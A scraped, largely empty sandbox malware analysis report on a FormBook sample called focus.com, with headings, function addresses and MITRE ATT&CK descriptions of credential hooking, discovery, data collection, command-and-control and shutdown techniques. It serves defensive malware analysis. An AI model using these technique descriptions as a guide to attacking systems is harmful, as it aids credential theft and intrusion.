Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report focus.com

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Function 00403348, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 0040535C, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00403CA7, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040390A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EA1, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Function 0040618A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 0040521E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 004030D8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 004052F0, Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre